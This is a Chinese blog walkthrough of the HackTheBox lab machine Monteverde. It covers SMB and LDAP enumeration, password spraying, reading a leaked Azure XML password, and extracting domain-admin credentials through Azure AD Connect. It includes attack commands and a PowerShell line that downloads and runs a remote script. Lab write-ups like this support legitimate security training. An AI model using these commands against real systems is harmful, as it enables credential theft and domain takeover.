No.188-HackTheBox-windows-Monteverde-Walkthrough渗透学习

最新推荐文章于 2024-08-11 18:44:16 发布
最新推荐文章于 2024-08-11 18:44:16 发布
阅读量281 收藏
点赞数
分类专栏: Hack The box 文章标签: python linux 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/108094626
版权

**

HackTheBox-windows-Monteverde-Walkthrough

**
靶机地址:https://www.hackthebox.eu/home/machines/profile/223
靶机难度:中级(4.3/10)
靶机发布日期:2020年3月23日
靶机描述:
Monteverde is an easy Windows machine that features Azure AD Connect. The domain is enumerated and a user list is created. Through password spraying, the SABatchJobs service account is found to have the username as a password. Using this service account, it is possible to enumerate SMB Shares on the system, and the $users share is found to be world-readable. An XML file used for an Azure AD account is found within a user folder and contains a password. Due to password reuse, we can connect to the domain controller as mhope using WinRM.
Enumeration shows that Azure AD Connect is installed. It is possible to extract the credentials for the account that replicates the directory changes to Azure (in this case the default domain administrator).

作者:大余
时间:2020-08-19

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.172…
在这里插入图片描述
可看到nmap开了很多端口,其中有端口53(DNS),389(LDAP)和445(SMB)等…和上一台一样开始枚举LDAP…

在这里插入图片描述
命令:enum4linux -a 10.10.10.172
枚举获得了用户名信息…
在这里插入图片描述
命令:smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs
这里通过crackmapexec测试,发现用户名和密码是一致的…利用smbmap查看了smb下有什么信息…
发现users,继续枚举发现了目录下存在azure.xml文件,可能存在azure漏洞利用了…

在这里插入图片描述
命令:smbclient -U SABatchJobs //10.10.10.172/users$ SABatchJobs -c 'get mhope/azure.xml azure.xml'
下载到本地,打开发现了passwd信息…

在这里插入图片描述
由于该配置文件位于mhope的目录中,这里猜想用户就是mhope…
尝试利用winrm成功登录…获得了user_flag信息…

在这里插入图片描述
由于前面遇到了azure.xml信息,直接枚举了mhope用户群组,发现了*Azure Admins…
在这里插入图片描述
查看到了很多应用程序…
https://blog.xpnsec.com/azuread-connect-for-redteam/ —如何利用Azure漏洞
Azure漏洞较严重,可以直接获得用户名密码信息…
在这里插入图片描述
命令:iex(new-object net.webclient).downloadstring('http://10.10.14.2/Azureshell.ps1')

https://myitworld.azurewebsites.net/2015/12/14/access-sql-server-integrated-security-different-windows-credentials-powershell/ —EXP
https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Azure-ADConnect.ps1 --EXP
这里的poc谷歌上很多…也很多解释了Azure exploit的方法…感兴趣的多了解下…
直接利用脚本获得了administrator用户名密码…

在这里插入图片描述
利用winrm登录了administrator用户后,获得了root_flag信息…

好久没打windows渗透了,回来打两台发现挺简单的…
两台都是smb和ldap中信息收集然后提权…

由于我们已经成功得到root权限查看user和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hack The Box——Monteverde
江左盟的博客
06-20 519
目录 简介 信息收集 端口扫描与服务识别 枚举域信息 漏洞发现 暴力破解弱口令 漏洞利用 获得域用户密码 权限提升 总结 简介 该靶机又是一台简单的Windows Azure Active Directory域控主机。通过枚举域用户smb服务发现弱口令,进一步通过共享文件夹泄漏的域用户mhope的密码登录域控主机,接着利用Azure Admins组的权限查询SQLServer中存储的域管理员的密码,进而获得域管理员权限。 信息收集 端口扫描与服务识别 使用nmap 10.10.
HTB打靶日记:Monteverde
m0_73998094的博客
12-27 651
HTB打靶日记:Monteverde
HTB-Monteverde
TA不懒,但还没有添加简介
04-16 194
HTB-Monteverde
Hack The Box -----------------------Active
大方子
12-16 6927
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2857
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
安装DB2v10.5Express-C
gsls200808的专栏
06-12 8202
首先需要从官网下载安装包,一般可以间接的通过网盘离线下载下载完成后如图 双击后会弹出自解压对话框,等待解压完成,会自耦定解压到%TEMP%\EXPC目录下,如图 一般情况下不用管这个目录,正常情况解压完成就会弹出安装界面,如果没有弹出,可以再次解压或者进这个目录点击setup.exe DB2 安装启动板如图 点击安装产品-->安装新产品 点击下一步 点击“我
拯救我的标签「Save my Tabs」-crx插件
03-12
立即保存所有的选项卡。 “保存我的标签页”是一个扩展,只需单击一下即可将所有打开的标签页保存在浏览器中。单击后,您可以选择:-选择要保存的...由SG Web和Monteverde撰写。 支持语言:English,português (Brasil)
Save my Tabs-crx插件
04-02
语言:English,português (Brasil) 一次保存所有标签。 “保存我的标签页”是一个扩展,只需单击一下即可将所有打开的标签页保存在浏览器中。 单击后,您可以选择:-选择要保存的选项卡-...由SG Web和Monteverde撰写。
OSCP LABS TO PRACTICE 2023.pdf
10-06
**HACK THE BOX LABS** 提供了更真实的在线靶场环境,如Forest、Active、Reel、Multimaster、Mantis、Blackfield、Search、Monteverde、Intelligence、Sizzle、Intelligence、APT、Object、Support、Acute、Time...
大模型微调工具-torchtune
weixin_40777649的博客
08-08 793
1.定义2.安装3. 案例。
伐木工 (100%用例)D卷 (Java&&Python&&C++&&Node.js&&C语言)
荆赫同艺的博客
08-07 256
一根 4米长的树木,伐木工不需要切割为 2*2,省去切割成本,直接整根树木交易,为 4*1,收益最大为 4。方式二: 3,2,2,3,但方式二,伐木工多切割一次,增加了切割成本却卖了一样的价格,因此并不是最优收益。一根 2 米长的树木,伐木工不切割,为2*1,收益最大为 2。一根5 米长的树木,伐木工切割为 2*3,收益最大为 6。输出最优收益时的各个树木长度,以空格分隔,按升序排列。一根 10 米长的树木,伐木工可以切割。方式一:3,4,4,也可以切割为。
jupyter下载
Einstein·Jun
08-06 731
Anaconda下载 参考链接:https://blog.csdn.net/qq_48372575/article/details/125630622 设置Jupyter Notebook的代码路径 在“此电脑”中搜索。删除最后一个""后面的的内容,包括“\”。 用记事本打开它。 按下ctrl+F就可以开始查找。查找内容如下: 找到之后,右键该文件,找到“发送到”,找到“桌面快捷方式”。然后就会发现桌面上已经建立好了!
Python 算法交易实验80 QTV200日常推进-目标估算
yukai08008的博客
08-10 372
业务目标在先,月利3%是第一个目标。虽然日常有在常规推进,但目标是什么?现在做的是什么?与目标的关联是什么?业务上讲,如果月利能够达到3%(几何平均),上下波动不超过1%,就算达标了(2%~4%)。考虑到金融领域有不可测风险,所以资金还会分摊到3个月。例如,假如总投资资金是30万,那么每个月的最大投资金额是10万。这样即使遇到大跳水,问题也不大。目标达到的话,10万本金每月的盈利是3000, 按复利计,24个月就会double,我觉得已经足够理想。假设投资90万,则可以按30万计算复利效果。
NVIDIA-CUDA
qq_41081716的博客
08-08 406
CUDA 是一种强大的并行计算平台,它极大地扩展了 GPU 的用途,使其不仅仅局限于图形处理。通过利用 CUDA,开发人员可以编写高效、高性能的并行应用程序,这些应用程序可以用于各种计算密集型任务。如果您正在从事高性能计算或需要加速计算任务的工作,CUDA 是一个非常有用的工具。
Falsk测试与部署(第九阶段)
蜡笔小新星的博客
08-09 609
在本章节中,我们学习了如何使用unittest和pytest进行单元和集成测试,以及如何配置Flask应用,使用WSGI服务器部署,容器化Flask应用并将其部署到各种云服务平台。通过这些步骤,你可以确保你的Flask应用在生产环境中的稳定性和可靠性。希望这些知识能够帮助你在实际项目中更好地实现测试和部署。
python语言程序设计》2018版第6章第42题Turtle:绘制sin函数,使用程序清单6-14中的函数简化5.52代码
电饭叔
08-10 227
在output06th.py中的代码。
【深度学习】P1 深度学习数据结构
weixin_43098506的博客
08-07 779
深度学习的数据结构——张量的概念与其基本操作
python识别车辆标志
weixin_45570158的博客
08-09 405
要使用Python来识别车辆标志,你通常会用到计算机视觉库,如OpenCV,结合深度学习框架如TensorFlow或PyTorch。这里我将提供一个基于OpenCV和TensorFlow(使用预训练模型,如MobileNetV2)的基本示例。
windows下wsl ubuntu 搭建深度学习环境
最新发布
qq_35661896的博客
08-11 427
删除之前安装的ubuntu;查看都安装了哪些版本:wsl -l -v删除想要删除的版本:wsl --unregister ${名字}删除之后 ubuntu.exe的安装包还在c盘中, 找到它, 并将 ubuntu.exe的所在文件夹的所有文件都复制到你想要安装的新的路径下,比如我在E盘新创建一个文件夹: E:\wsl_ubuntu_20.04,复制过去后如下:然后卸载c盘的ubuntu;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值